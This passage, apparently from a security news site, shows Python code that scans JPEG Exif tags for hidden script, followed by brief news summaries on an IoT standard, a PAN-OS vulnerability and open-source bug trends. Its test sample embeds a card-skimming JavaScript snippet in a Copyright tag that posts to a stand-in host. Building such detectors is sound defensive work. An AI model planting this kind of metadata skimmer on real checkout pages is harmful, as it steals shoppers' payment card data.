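        if marker in (0xD9, 0xDA):          # EOI or SOS: all metadata segments are behind us
            return
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("bad segment length at offset %d" % pos)
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def exif_ascii_tags(app1_body: bytes) -> dict:
    """Parse IFD0 of an Exif APP1 segment; return {tag_id: text} for ASCII-typed entries."""
    if not app1_body.startswith(b"Exif\x00\x00"):
        return {}
    tiff = app1_body[6:]
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None:
        raise ValueError("bad TIFF byte-order mark")
    magic, ifd_offset = struct.unpack(endian + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    count = struct.unpack(endian + "H", tiff[ifd_offset:ifd_offset + 2])[0]
    tags = {}
    for i in range(count):
        entry = ifd_offset + 2 + 12 * i
        tag, typ, n, value = struct.unpack(endian + "HHII", tiff[entry:entry + 12])
        if typ != 2:                         # skip numeric and rational tags
            continue
        # Values of four bytes or fewer live inline in the value field; longer ones at an offset.
        raw = tiff[entry + 8:entry + 8 + n] if n <= 4 else tiff[value:value + n]
        tags[tag] = raw.rstrip(b"\x00").decode("latin-1", "replace")
    return tags


def find_script_in_metadata(image: bytes) -> list:
    """Return [(tag_name, matched_patterns, preview)] for each ASCII EXIF tag that looks like code."""
    findings = []
    for marker, body in iter_jpeg_segments(image):
        if marker != 0xE1:                   # APP1 carries Exif (XMP also uses APP1; ignored here)
            continue
        for tag, text in exif_ascii_tags(body).items():
            hits = [p for p in SCRIPT_PATTERNS if re.search(p, text)]
            if hits:
                findings.append((ASCII_TAG_NAMES.get(tag, "0x%04X" % tag), hits, text[:60]))
    return findings


def build_jpeg_with_copyright(copyright_text: bytes) -> bytes:
    """Constructed sample: a JPEG shell (SOI, one Exif APP1 segment, EOI) whose IFD0 holds a
    single Copyright tag. Not a decodable picture; it exists to exercise the scanner offline."""
    value = copyright_text + b"\x00"
    value_offset = 8 + 2 + 12 + 4            # TIFF header + entry count + one entry + next-IFD pointer
    tiff = b"II" + struct.pack("<HI", 42, 8) + struct.pack("<H", 1)
    tiff += struct.pack("<HHII", 0x8298, 2, len(value), value_offset) + struct.pack("<I", 0) + value
    payload = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload + b"\xff\xd9"


BENIGN_FAVICON = build_jpeg_with_copyright(b"Copyright 2020 Example Shop")
SKIMMER_FAVICON = build_jpeg_with_copyright(
    b"Copyright 2020; eval(function(p,a,c,k,e,d){var cc=document.getElementById('cc_number').value;"
    b"new XMLHttpRequest().open('POST','https://collector.invalid/')}())")

if __name__ == "__main__":
    for label, img in (("benign", BENIGN_FAVICON), ("skimmer", SKIMMER_FAVICON)):
        print(label, find_script_in_metadata(img))
```

Run against the images a checkout page actually loads (the real skimmer was hosted off-site and fetched by a small loader script), not only the favicon in the site's own root; a metadata scan of every image the page references is cheap compared with reviewing the JavaScript that reads it.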

  • news

    Visible to the public "New Cybersecurity Standard for IoT Devices Established By ETSI"

    The European Telecommunications Standards Institute (ETSI) Technical Committee on Cybersecurity has published a new standard for the Internet of Things (IoT), ETSI EN 303 645. It was developed in collaboration with members from academia, industry, and government to bolster the security of consumer IoT devices such as children's toys, baby monitors, smart cameras, wearable health trackers, and smart home assistants. The goal is to restrict cybercriminals' ability to take over devices, launch distributed denial-of-service (DDoS) attacks, mine cryptocurrency, and spy on users. This article continues to discuss the aim and development of the new cybersecurity standard for IoT devices.

    Infosecurity Magazine reports "New Cybersecurity Standard for IoT Devices Established By ETSI"

  • news

    Visible to the public "US Cyber Command Says Foreign Hackers Will Most Likely Exploit New PAN-OS Security Bug"

    US Cyber Command is warning that foreign state-sponsored hacking groups will likely try to exploit a critical security bug disclosed today in PAN-OS, the operating system running on firewalls and enterprise VPN appliances from Palo Alto Networks. The vulnerability (CVE-2020-2021) is an authentication bypass that lets adversaries access a device without valid credentials; it affects only devices on which SAML authentication is enabled and the "Validate Identity Provider Certificate" option is disabled. Once exploited, the bug lets hackers change PAN-OS settings and features, including disabling firewall or VPN access-control policies, effectively neutralizing the device. The vulnerability received a 10/10 CVSSv3 score: it is exploitable remotely over the internet, requires no advanced technical skill, and does not require attackers to gain an initial foothold on the targeted device.

    ZDNet reports: "US Cyber Command Says Foreign Hackers Will Most Likely Exploit New PAN-OS Security Bug"

  • news

    Visible to the public SoS Musings #38 - Critical Infrastructure Cybersecurity

    SoS Musings #38 -

    Critical Infrastructure Cybersecurity

  • news

    Visible to the public "New Vulnerabilities in Open Source Packages Down 20% Compared to Last Year"

    Researchers at Snyk have found that new vulnerabilities in open source packages are down 20 percent compared to last year, suggesting that the security of open source packages and containers is heading in a positive direction. Cross-site scripting vulnerabilities were the most commonly reported class. The researchers also found that SQL injection vulnerabilities are decreasing in prevalence in most ecosystems but have increased over the last three years in PHP packages.

    Help Net Security reports: "New Vulnerabilities in Open Source Packages Down 20% Compared to Last Year"

  • news

    Visible to the public Cyber Scene #45 - Cyber Offense and Defense: The U.S. Election 3D Chessboard

    Cyber Scene #45 -

    Cyber Offense and Defense: The U.S. Election 3D Chessboard

  • news

    Visible to the public Cybersecurity Snapshots #7 - Is Online Voting a Good Idea?

    Cybersecurity Snapshots #7 -

    Is Online Voting a Good Idea?

  • news

    Visible to the public Spotlight on Lablet Research #7 - Foundations of Cyber-Physical Systems Resilience

    Spotlight on Lablet Research #7 -

    Project: Foundations of Cyber-Physical Systems Resilience